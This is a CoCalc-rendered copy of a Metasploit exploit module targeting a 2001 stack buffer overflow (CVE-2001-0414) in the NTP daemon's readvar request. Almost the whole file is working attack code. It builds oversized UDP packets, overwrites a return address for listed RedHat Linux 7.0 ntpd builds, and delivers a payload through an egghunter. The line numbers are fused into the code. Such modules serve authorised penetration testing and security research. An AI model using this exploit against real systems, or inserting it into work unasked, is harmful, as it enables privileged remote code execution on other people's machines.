CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
Path: blob/master/modules/exploits/multi/ntp/ntp_overflow.rb
Views: 1904
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = GoodRanking78include Msf::Exploit::Remote::Udp9include Msf::Exploit::Remote::Egghunter1011def initialize(info = {})12super(update_info(info,13'Name' => 'NTP Daemon readvar Buffer Overflow',14'Description' => %q{15This module exploits a stack based buffer overflow in the16ntpd and xntpd service. By sending an overly long 'readvar'17request it is possible to execute code remotely. As the stack18is corrupted, this module uses the Egghunter technique.19},20'Author' => 'aushack',21'License' => MSF_LICENSE,22'References' =>23[24[ 'CVE', '2001-0414' ],25[ 'OSVDB', '805' ],26[ 'BID', '2540' ],27[ 'US-CERT-VU', '970472' ],28],29'Payload' =>30{31'Space' => 220,32'BadChars' => "\x00\x01\x02\x16,=",33'StackAdjustment' => -3500,34'PrependEncoder' => Metasm::Shellcode.assemble(Metasm::Ia32.new, "xor eax,eax mov al,27 int 0x80").encode_string, # alarm(0)35'Compat' =>36{37'ConnectionType' => '-reverse',38},39},40'Platform' => [ 'linux' ],41'Arch' => [ ARCH_X86 ],42'Targets' =>43[44[ 'RedHat Linux 7.0 ntpd 4.0.99j', { 'Ret' => 0xbffffbb0 } ],45[ 'RedHat Linux 7.0 ntpd 4.0.99j w/debug', { 'Ret' => 0xbffff980 } ],46[ 'RedHat Linux 7.0 ntpd 4.0.99k', { 'Ret' => 0xbffffbb0 } ],47#[ 'FreeBSD 4.2-STABLE', { 'Ret' => 0xbfbff8bc } ],48[ 'Debugging', { 'Ret' => 0xdeadbeef } ],49],50'Privileged' => true,51'DisclosureDate' => '2001-04-04',52'DefaultTarget' => 0))5354register_options([Opt::RPORT(123)])55end5657def exploit5859hunter = generate_egghunter(payload.encoded, payload_badchars, { :checksum => true })60egg = hunter[1]6162connect_udp6364pkt1 = "\x16\x02\x00\x01\x00\x00\x00\x00\x00\x00\x016stratum="65pkt2 = "\x16\x02\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00"6667sploit = pkt1 + make_nops(512 - pkt1.length)68sploit[(220 + pkt1.length), 4] = [target['Ret']].pack('V')69sploit[(224 + pkt1.length), hunter[0].length] = hunter[0]7071print_status("Trying target #{target.name}...")7273print_status("Sending hunter")74udp_sock.put(sploit)75select(nil,nil,nil,0.5)7677print_status("Sending payload")78udp_sock.put(pkt1 + egg)79select(nil,nil,nil,0.5)8081print_status("Calling overflow trigger")82udp_sock.put(pkt2)83select(nil,nil,nil,0.5)8485handler86disconnect_udp8788end89end909192